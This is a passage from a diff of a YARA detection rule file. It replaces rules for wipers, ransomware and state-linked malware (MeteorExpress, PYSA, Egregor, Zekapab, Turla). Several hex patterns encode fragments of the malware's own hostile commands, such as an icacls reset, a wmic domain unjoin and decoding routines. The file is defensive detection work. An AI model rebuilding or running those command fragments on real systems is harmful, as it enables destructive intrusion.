+		$block9 = { 73 67 44 51 6f 4a 43 57 31 6b 49 43 31 47 62 33 4a 6a 5a 53 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 70 49 41 30 4b 43 51 6c 48 5a 58 52 4a 52 43 41 4e 43 67 6b 4a 51 32 68 68 62 6d 64 6c 56 47 68 70 63 30 5a 70 62 47 55 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 6c 6b 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 66 53 41 4e 43 69 42 6d 64 57 35 6a 64 47 6c 76 62 69 42 74 59 57 6c 75 49 41 30 4b }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
+		filesize < 3KB and 7 of them
 }
-rule ARKBIRD_SOLG_MAL_PRIVATELOG_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_WIP_Meteorexpress_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect PRIVATELOG malware"
+		description = "Detect MeteorExpress/BreakWin wiper"
 		author = "Arkbird_SOLG"
-		id = "fa122d77-0bac-5836-85fd-b096660f7412"
-		date = "2021-09-01"
-		modified = "2021-09-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_PRIVATELOG_Sep_2021_1.yara#L1-L22"
+		id = "6dffc8c9-ccd0-5cf3-8f3c-38adad8508b2"
+		date = "2021-08-06"
+		modified = "2021-08-07"
+		reference = "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-07/BreakWin/WIP_MeteorExpress_Aug_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "4df78bc3005c67d467a0999751bf4fb42ff9075f1601d51ab3b2b88e5dc38f6e"
-		score = 50
-		quality = 50
+		logic_hash = "80e40479d699b988d1282e407edd51b5e3ea796ebf380d82f5a5aafaacafe75d"
+		score = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c"
-		hash2 = "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090"
-		level = "experimental"
-		tlp = "White"
+		hash1 = "2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b"
+		hash2 = "074bcc51b77d8e35b96ed444dc479b2878bf61bf7b07e4d7bd4cf136cc3c0dce"
+		hash3 = "6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4"
+		hash4 = "9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473"
+		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$s1 = { 41 89 d0 48 83 ec 20 4c 89 f1 31 d2 e8 cb 8c 00 00 48 83 ec 10 48 89 5c 24 20 48 8d 15 4b 03 02 00 48 c7 c1 02 00 00 80 45 31 c0 41 b9 19 01 02 00 ff 15 55 52 01 00 48 83 c4 30 89 c7 85 c0 75 5a 49 8d 46 02 48 8b 0b 48 83 ec 30 48 89 74 24 28 48 89 44 24 20 48 8d 15 4f 03 02 00 45 31 c0 45 31 c9 ff 15 1b 52 01 00 48 83 c4 30 89 c7 85 c0 75 28 66 41 c7 06 7b 00 48 83 ec 20 48 8d 15 c0 02 02 00 4c 89 f1 ff 15 17 52 01 00 4c 89 f1 e8 67 c9 00 00 48 83 c4 20 31 ff 48 8b 0b 48 83 ec 20 ff 15 d4 51 01 00 48 83 c4 20 48 8b 4d f8 48 31 e9 48 83 ec 20 e8 f0 79 00 00 48 83 c4 20 89 f8 48 89 ec }
-		$s2 = { 48 8d 0d 87 c9 01 00 48 8d 15 47 01 00 00 ff 15 1a 14 01 00 48 89 05 e3 d8 01 00 48 85 c0 0f 84 d0 00 00 00 c7 05 e8 d8 01 00 00 00 00 00 48 8d 15 d1 d8 01 00 c7 05 df d8 01 00 b8 0b 00 00 0f 28 05 80 1c 01 00 0f 29 05 b9 d8 01 00 44 8b 05 e2 c8 01 00 41 8d 48 01 89 0d d8 c8 01 00 44 89 05 b5 d8 01 00 48 89 c1 ff 15 b8 13 01 00 31 c9 ba 01 00 00 00 45 31 c0 45 31 c9 ff 15 b5 14 01 00 48 89 05 9e d8 01 00 48 85 c0 0f 84 85 00 00 00 48 b8 04 00 00 00 01 00 00 00 48 89 05 68 d8 01 00 48 8d 15 5d d8 01 00 c7 05 5f d8 01 00 00 00 00 00 48 c7 05 5c d8 01 00 00 00 00 00 48 8b 0d 39 d8 01 00 ff 15 5b 13 01 00 e8 61 01 00 00 85 c0 74 2b 48 b9 01 00 00 00 01 00 00 00 48 89 0d 25 d8 01 00 48 8d 15 1a d8 01 00 89 05 20 d8 01 00 eb 44 48 83 c4 28 48 ff 25 57 14 01 00 48 8b 0d 20 d8 01 00 ba ff ff ff ff ff 15 9d 13 01 00 e8 eb c5 ff ff 48 b8 01 00 00 00 01 00 00 00 48 89 05 e3 d7 01 00 48 8d 15 d8 d7 01 00 c7 05 da d7 01 00 00 00 00 00 48 c7 05 d7 d7 01 00 00 00 00 00 48 8b 0d b4 d7 01 00 48 83 c4 28 48 ff 25 d1 12 01 00 48 83 ec 28 83 f9 01 75 69 48 b8 03 00 00 00 01 00 00 00 48 89 05 9b d7 01 00 48 8d 15 90 d7 01 00 31 c0 89 05 94 d7 01 00 89 05 9a d7 01 00 8b 05 ac c7 01 00 8d 48 01 89 0d a3 c7 01 00 89 05 81 d7 01 00 48 8b 0d 5e d7 01 00 ff 15 80 12 01 }
-		$s3 = { 48 89 01 c7 44 24 28 00 00 00 00 c7 44 24 20 03 00 00 00 ba 00 00 00 80 41 b8 01 00 00 00 45 31 c9 ff 15 f7 59 01 00 48 83 f8 ff 0f 84 e0 01 00 00 48 89 c6 0f 57 c0 48 8d 94 24 a0 00 00 00 0f 29 42 60 0f 29 42 50 0f 29 42 40 0f 29 42 30 0f 29 42 20 0f 29 42 10 0f 29 02 48 c7 42 70 00 00 00 00 4c 8d 44 24 7c 41 c7 00 78 00 00 00 48 89 c1 ff 15 9f 59 01 00 85 c0 0f 84 d0 01 00 00 8b 84 24 dc 00 00 00 c1 e0 0d 48 8d 8c 24 98 00 00 00 48 89 4c 24 38 89 44 24 20 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 48 89 f1 31 d2 45 31 c0 45 31 c9 ff 15 53 59 01 00 85 }
-		$s4 = { c6 00 00 48 ff c0 48 83 ec 20 48 89 f9 48 89 c2 ff 15 8e 19 01 00 48 8d 15 a9 cd 01 00 48 89 d9 ff 15 86 19 01 00 48 89 d9 ff 15 55 19 01 00 48 }
-		$s5 = "Global\\APCI#" fullword wide
-		$s6 = "uGlobal\\HVID_" fullword ascii
+		$s1 = { 8d 04 2a 8b f1 3b c8 0f 42 f0 33 c9 8b c6 83 c0 01 0f 92 c1 f7 d9 0b c8 e8 42 00 00 00 53 68 18 2c 41 00 50 89 44 24 1c 89 5f 10 89 77 14 e8 aa 20 00 00 8b 74 24 1c 83 c4 0c c6 04 1e 00 83 fd 10 72 0a 8b 0f 8d 55 01 e8 50 00 00 00 5d 89 37 8b c7 5f 5e 5b 59 }
+		$s2 = { 68 cc 00 00 00 b8 [3] 00 e8 [2] 00 00 8b f1 89 75 8c 83 4d d4 ff 33 c0 83 4d d8 ff 6a 44 5f 57 50 89 45 dc 89 45 e0 8d 45 90 50 e8 [3] 00 8d 46 1c 89 7d 90 83 c4 0c 83 78 14 08 72 02 8b 00 89 45 98 8d 7d e4 33 c0 83 c6 04 ab 8b ce 83 7e 14 08 ab ab 72 02 8b 0e 8b 46 10 8d 04 41 8b ce 72 02 8b 0e ff 75 8c 33 d2 50 51 8d 4d e4 89 55 e4 89 55 e8 89 55 ec e8 [2] fd ff 33 d2 89 55 fc 8b 45 e8 89 55 88 39 45 ec 74 0d 33 c9 66 89 08 83 c0 02 89 45 e8 eb 0f 8d 4d 88 51 50 8d 4d e4 e8 3c 02 00 00 33 d2 8b 7d 8c 8d 4d d4 51 8d 4d 90 51 8b 47 34 52 52 52 52 52 52 ff 75 e4 52 ff 70 04 ff 15 08 [2] 00 85 c0 74 28 ff 75 d8 8d 4f 3c e8 [2] ff ff ff 75 d4 8d }
+		$s3 = { 8b ec 83 e4 f8 83 ec 7c a1 14 50 41 00 33 c4 89 44 24 78 8b 45 0c 8b 4d 08 89 0c 24 53 56 57 83 e8 01 0f 84 05 01 00 00 83 e8 01 0f 84 23 01 00 00 83 e8 0d 74 15 ff 75 14 ff 75 10 ff 75 0c 51 ff 15 2c e1 40 00 e9 0b 01 00 00 8d 44 24 40 c6 05 f4 63 41 00 01 50 51 ff 15 30 e1 40 00 8b d8 6a 00 89 5c 24 18 ff 15 10 e0 40 00 8b f0 8d 44 24 48 56 50 53 ff 15 28 e1 40 00 56 ff 15 0c e0 40 00 83 3d f8 63 41 00 00 0f 84 8d 00 00 00 53 ff 15 04 e0 40 00 ff 35 f8 63 41 00 89 44 24 14 50 ff 15 00 e0 40 00 8b d8 8d 44 24 18 50 6a 18 ff 35 f8 63 41 00 ff 15 14 e0 40 00 8b 7c 24 20 8d 44 24 30 8b 74 24 1c 50 ff 74 24 10 ff 15 44 e1 40 00 8b 44 24 38 2b c6 8b 74 24 10 68 20 00 cc 00 99 2b c2 6a 00 8b c8 8b 44 24 44 6a 00 56 ff 74 24 30 2b c7 d1 f9 ff 74 24 30 99 2b c2 d1 f8 50 51 ff 74 24 34 ff 15 18 e0 40 00 53 56 ff 15 00 e0 40 00 56 ff 15 08 e0 40 00 8d 44 24 40 }
+		$s4 = { 38 1b 38 26 38 2e 38 39 38 3f 38 4a 38 50 38 5e 38 67 38 6c 38 79 38 7e 38 ec 38 }
+		$s5 = { 55 8b ec 51 a1 60 57 41 00 83 f8 fe 75 0a e8 8e 0d 00 00 a1 60 57 41 00 83 f8 ff 75 07 b8 ff ff 00 00 eb 1b 6a 00 8d 4d fc 51 6a 01 8d 4d 08 51 50 ff 15 50 e0 40 00 85 c0 74 e2 66 8b 45 08 8b }
+		$s6 = { 69 63 61 63 6c 73 2e 65 78 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 44 61 74 61 5c 53 2d 31 2d 35 2d 31 38 5c 52 65 61 64 4f 6e 6c 79 22 20 2f 72 65 73 65 74 20 2f 54 }
+		$s7 = { 77 6d 69 63 20 63 6f 6d 70 75 74 65 72 73 79 73 74 65 6d 20 77 68 65 72 65 20 6e 61 6d 65 3d 22 25 63 6f 6d 70 75 74 65 72 6e 61 6d 65 25 22 20 63 61 6c 6c 20 75 6e 6a 6f 69 6e 64 6f 6d 61 69 6e 6f 72 77 6f 72 6b 67 72 6f 75 70 }
+		$s8 = { 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 }
+		$s9 = { 8b 55 ?? 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 08 ff 15 ?? ?? 47 00 8b d0 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 09 8d 45 ?? 50 8d 45 ?? 50 8d 4d ?? e8 ?? ?? ?? ff 83 ec 0c 8b cc 89 65 ?? 51 ff 70 04 ff 30 e8 ?? ?? ?? ff c6 45 fc 0a 83 ec 18 8b cc 89 65 ?? 68 ?? ?? 48 00 e8 ?? ?? ?? ff c6 45 fc 0b c6 45 fc 09 8d }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_PYSA_Sept_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT28_Zekapab_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect the PYSA ransomware"
+		description = "Detect Zekapab used by APT28 group"
 		author = "Arkbird_SOLG"
-		id = "fd939287-ec37-5021-9782-f0f86a9f0e4b"
-		date = "2021-09-23"
-		modified = "2021-11-10"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/PYSA/RAN_PYSA_Sept_2021_1.yara#L1-L20"
+		id = "634f32dd-8bcf-5c58-a335-9b66ff568a54"
+		date = "2021-03-15"
+		modified = "2021-03-15"
+		reference = "https://twitter.com/DrunkBinary/status/1371423755608719360"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-15/APT28/APT_APT28_Zekapab_Mar_2021_1.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "e16f2ae581b8627ccd4e8ecb56db52c992022473d006843ed19a69c8059ecb54"
-		score = 75
-		quality = 75
+		logic_hash = "dabaab47c193a05620d282a00b6b47f710cfa6b1efc699ea5d47267d10cfdcb6"
+		score = 60
+		quality = 23
 		tags = "FILE"
-		hash1 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14"
-		hash2 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14"
-		hash3 = "44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9"
-		tlp = "white"
-		adversary = "RAAS"
+		hash1 = "eae62bb4110bcd00e9d1bcaba9000defcda3d1ab832fa2634d928559d066cb15"
 
 	strings:
-		$s1 = { 57 ff 15 38 a0 45 00 be [2] 45 00 33 ff 56 57 68 01 00 1f 00 ff 15 34 a0 45 00 85 c0 75 2b 56 57 57 ff 15 30 a0 45 00 57 8b f0 e8 44 00 00 00 6a 01 e8 3d 00 00 00 59 59 e8 3f ff ff ff 56 ff 15 2c a0 45 00 }
-		$s2 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 8d 45 f8 50 6a 02 6a 00 68 [2] 45 00 68 02 00 00 80 ff 15 0c a0 45 00 8b 15 bc 50 47 00 8b ca 8d 71 01 8a 01 41 84 c0 75 f9 2b ce 8b 35 08 a0 45 00 8d 41 01 50 52 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 6a 05 68 [2] 45 00 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 ff 75 f8 ff 15 10 a0 45 00 8b 4d fc 33 cd 5e e8 [2] 02 00 }
-		$s3 = { 57 8d 85 f8 fe ff ff bb 04 01 00 00 50 53 ff 15 48 a0 45 00 8d bd f8 fe ff ff 4f 8a 47 01 47 84 c0 75 f8 be [2] 45 00 8d 85 f4 fd ff ff 53 50 33 db a5 53 a5 66 a5 a4 ff 15 74 a0 45 00 8b cb 8a 84 0d f4 fd ff ff 88 84 0d f0 fc ff ff 41 84 c0 75 ed 8d 85 f0 fc ff ff 6a 5c 50 e8 [2] 02 00 59 59 85 c0 74 02 88 18 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 f8 fe ff ff 50 ff 15 1c a0 45 00 8b f8 83 ff ff 0f 84 a7 00 00 00 b9 78 50 47 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 95 f4 fd ff ff 8d 72 01 8a 02 42 84 c0 75 f9 2b d6 8d b5 f8 fe ff ff 8d 5e 01 8a 06 46 84 c0 75 f9 2b f3 83 c1 14 8d 04 56 03 c1 e8 [2] 02 00 8b f4 8d 85 f8 fe ff ff 50 8d 85 f0 fc ff ff 50 8d 85 f4 fd ff ff 50 50 68 78 50 47 00 56 ff 15 a0 a1 45 00 8b ce 83 c4 18 8d 51 01 8a 01 41 84 c0 75 f9 33 db 8d 85 ec fc ff ff 53 50 2b ca 51 56 57 ff 15 88 a0 45 00 57 ff 15 7c a0 45 00 53 53 53 8d 85 f8 fe ff ff 50 68 [2] 45 00 53 ff 15 94 a1 45 00 8d a5 e0 fc ff ff 5f 5e 5b 8b }
-		$s4 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 68 [2] 46 00 68 [2] 46 00 68 [2] 46 00 6a 11 e8 c6 fb ff ff 8b f0 83 c4 10 85 f6 74 12 ff 75 0c 8b ce ff 75 08 ff 15 a8 a1 45 00 ff d6 eb 14 6a 00 ff 75 0c ff 75 08 ff 15 4c a1 45 00 50 e8 d6 00 00 00 8b 4d fc 33 cd 5e e8 [2] fe ff 8b e5 }
-		$s5 = { 8b ec 6a ff 68 [2] 45 00 64 a1 00 00 00 00 50 83 ec 44 a1 34 52 47 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 3d 04 a0 45 00 68 00 00 00 f0 6a 01 6a 00 6a 00 56 c7 06 00 00 00 00 ff d7 85 c0 75 60 ff 15 54 a0 45 00 6a 08 6a 01 6a 00 68 [2] 45 00 56 8b d8 ff d7 85 c0 75 46 6a 28 6a 01 50 68 [2] 45 00 56 ff d7 85 c0 75 35 53 ff 15 58 a0 45 00 68 [2] 45 00 8d 4d d8 e8 ?? 8a fd ff 8d 45 d8 c7 45 fc 00 00 00 00 50 8d 4d b0 e8 d3 00 00 00 68 [2] 47 00 8d 45 b0 50 e8 [2] 00 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 [2] 00 00 }
+		$s1 = { 68 74 74 70 3A 2F 2F }
+		$s2 = { 68 74 74 70 73 3A 2F 2F }
+		$s3 = { 32 44 34 46 37 30 36 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 32 44 }
+		$s4 = { 35 30 34 33 32 30 34 45 36 31 36 44 36 35 33 41 32 30 }
+		$s5 = { 34 42 34 32 37 32 36 34 32 30 34 43 36 31 36 45 36 37 33 41 32 30 }
+		$s6 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 }
+		$header1 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 }
+		$header2 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 }
+		$dbg1 = { 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 0d 00 4e 00 6f 00 74 00 20 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 }
+		$dbg2 = { 53 00 79 00 73 00 74 00 65 00 6d 00 20 00 45 00 72 00 72 00 6f 00 72 00 2e 00 20 00 20 00 43 00 6f 00 64 00 65 00 3a 00 20 00 25 00 64 00 2e 00 0d 00 0a 00 25 00 73 }
+		$dbg3 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 00 2e 00 0a 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 2e }
+		$dbg4 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 }
+		$dbg5 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 00 2e }
+		$dbg6 = { 53 00 6f 00 63 00 6b 00 65 00 74 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 23 00 20 00 25 00 64 00 0d 00 0a 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 100KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 1 of ( $header* ) and 3 of ( $s* ) and 4 of ( $dbg* )
 }
-rule ARKBIRD_SOLG_UNK_DEV_0322_Jul_2021_1 : CVE_2021_35211 FILE
+rule ARKBIRD_SOLG_Ran_Egregor_Sept_2020_1 : FILE
 {
 	meta:
-		description = "Detect the script used by DEV-0322 for create a new user after exploit the CVE-2021-35211"
+		description = "Detect Egregor ransomware (variant Sept2020)"
 		author = "Arkbird_SOLG"
-		id = "8d16eb7f-c137-5f23-8830-ce26dc6e4d52"
-		date = "2021-07-16"
-		modified = "2021-11-10"
-		reference = "https://www.cadosecurity.com/triage-analysis-of-serv-u-ftp-user-backdoor-deployed-by-cve-2021-35211/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/DEV_0322/UNK_DEV_0322_Jul_2021_1.yara#L1-L26"
+		id = "b44b93ec-b470-511e-b08f-7d83efd30ecc"
+		date = "2020-10-07"
+		modified = "2020-10-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Egregor_Sept_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "7d7f012053bff6217f0fe9087acbeba13f83cb2c3dbe9a4fe8e7e0e4551edefd"
+		logic_hash = "4ce7398cc6ad0538735aec6490204122690f029cbb8d20f9efd2f612955f106b"
 		score = 75
-		quality = 59
-		tags = "CVE-2021-35211, FILE"
-		hash1 = "fb101d9980ba2e22dceac7367c670b4894eaae9a8cef9de98ed85499a3b014ea"
-		hash2 = "134a570f480536d04a056da99e58a3c982aa36f5b314f48a01420b66b759d35d"
-		hash3 = "8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0"
-		tlp = "white"
-		adversary = "DEV-0322"
+		quality = 75
+		tags = "FILE"
+		hash1 = "4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321"
+		hash2 = "aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7"
+		hash3 = "3fd510a3b2e0b0802d57cd5b1cac1e61797d50a08b87d9b5243becd9e2f7073f"
+		hash4 = "9c900078cc6061fb7ba038ee5c065a45112665f214361d433fc3906bf288e0eb"
+		hash5 = "a376fd507afe8a1b5d377d18436e5701702109ac9d3e7026d19b65a7d313b332"
 
 	strings:
-		$obj1 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 }
-		$obj2 = { 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 }
-		$arg1 = { 2d 73 74 6f 70 65 6e 67 69 6e 65 }
-		$arg2 = { 2d 73 74 61 72 74 73 65 72 76 69 63 65 }
-		$s1 = { 3c 3c 2d 20 41 64 6d 69 6e 54 79 70 65 }
-		$s2 = { 43 55 73 65 72 50 61 73 73 77 6f 72 64 41 74 74 72 5c 72 5c 6e 50 61 73 73 77 6f 72 64 }
-		$s3 = { 3c 3c 2d 20 50 61 73 73 77 6f 72 64 43 68 61 6e 67 65 64 4f 6e 5c 72 5c 6e 43 52 68 69 6e 6f 55 69 6e 74 41 74 74 72 }
-		$s4 = { 3c 3c 2d 20 49 6e 63 6c 75 64 65 52 65 73 70 43 6f 64 65 73 49 6e 4d 73 67 46 69 6c 65 73 }
+		$x1 = "dmocx.dll" fullword ascii
+		$s2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
+		$s3 = "M:\\sc\\p\\testbuild.pdb" fullword ascii
+		$s4 = "Type Descriptor'" fullword ascii
+		$s5 = "=$=`=h=p=t=x=|=" fullword ascii
+		$s6 = "--nop" fullword wide
+		$s7 = "9,94989@9X9" fullword ascii
 
 	condition:
-		filesize > 1KB and filesize < 15KB and all of ( $obj* ) and all of ( $arg* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $x* ) and 4 of ( $s* )
 }
 rule ARKBIRD_SOLG_Ran_Crysis_Sep_2020_1 : FILE
 {
@@ -147972,300 +148718,405 @@ rule ARKBIRD_SOLG_Ran_Crysis_Sep_2020_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
 }
-rule ARKBIRD_SOLG_Ran_Egregor_Sept_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Turla_Ironpython_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect Egregor ransomware (variant Sept2020)"
+		description = "Detect IronPython script used by Turla group"
 		author = "Arkbird_SOLG"
-		id = "b44b93ec-b470-511e-b08f-7d83efd30ecc"
-		date = "2020-10-07"
-		modified = "2020-10-16"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Egregor_Sept_2020_1.yar#L1-L22"
+		id = "303929d4-2c43-5e43-aeb0-09f469f7091b"
+		date = "2021-04-30"
+		modified = "2021-05-01"
+		reference = "https://twitter.com/DrunkBinary/status/1388332507695919104"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Turla/APT_Turla_IronPython_Apr_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "4ce7398cc6ad0538735aec6490204122690f029cbb8d20f9efd2f612955f106b"
+		logic_hash = "f6b626cddb4832f842a15eddce705fb24125e4341c425cf27dbbe537e2a98bdc"
 		score = 75
-		quality = 75
+		quality = 57
 		tags = "FILE"
-		hash1 = "4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321"
-		hash2 = "aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7"
-		hash3 = "3fd510a3b2e0b0802d57cd5b1cac1e61797d50a08b87d9b5243becd9e2f7073f"
-		hash4 = "9c900078cc6061fb7ba038ee5c065a45112665f214361d433fc3906bf288e0eb"
-		hash5 = "a376fd507afe8a1b5d377d18436e5701702109ac9d3e7026d19b65a7d313b332"
+		hash1 = "65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361"
+		hash2 = "c430ebab4bf827303bc4ad95d40eecc7988bdc17cc139c8f88466bc536755d4e"
+		hash3 = "f76257749792cc4e54f75d0e7a83e7a4429395c5dbc48078a8068575d7e9a98"
+		tlp = "White"
+		adversary = "Turla"
 
 	strings:
-		$x1 = "dmocx.dll" fullword ascii
-		$s2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
-		$s3 = "M:\\sc\\p\\testbuild.pdb" fullword ascii
-		$s4 = "Type Descriptor'" fullword ascii
-		$s5 = "=$=`=h=p=t=x=|=" fullword ascii
-		$s6 = "--nop" fullword wide
-		$s7 = "9,94989@9X9" fullword ascii
+		$s1 = { 6c 61 6d 62 64 61 20 73 2c 6b 3a 27 27 2e 6a 6f 69 6e 28 5b 63 68 72 28 28 6f 72 64 28 63 29 5e 6b 29 25 30 78 31 30 30 29 20 66 6f 72 20 63 20 69 6e 20 73 5d 29 }
+		$s2 = { 66 72 6f 6d 20 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 20 69 6d 70 6f 72 74 2a }
+		$s3 = { 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 28 4b 65 79 53 69 7a 65 3d 31 32 38 2c 42 6c 6f 63 6b 53 69 7a 65 3d 31 32 38 29 }
+		$s4 = { 72 65 74 75 72 6e 20 53 79 73 74 65 6d 2e 41 72 72 61 79 5b 53 79 73 74 65 6d 2e 42 79 74 65 5d 28 5b 6f 72 64 28 78 29 66 6f 72 20 78 20 69 6e 20 6c 69 73 74 28 73 74 72 29 5d 29 }
+		$s5 = { 53 79 73 74 65 6d 2e 41 72 72 61 79 2e 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 53 79 73 74 65 6d 2e 42 79 74 65 2c [10-12] 2e 4c 65 6e 67 74 68 29 }
+		$s6 = { 28 62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 [4-10] 5b 31 36 3a 5d 29 2c 73 79 73 2e 61 72 67 76 5b 31 5d 2c [4-10] 5b 3a 31 36 5d 2c }
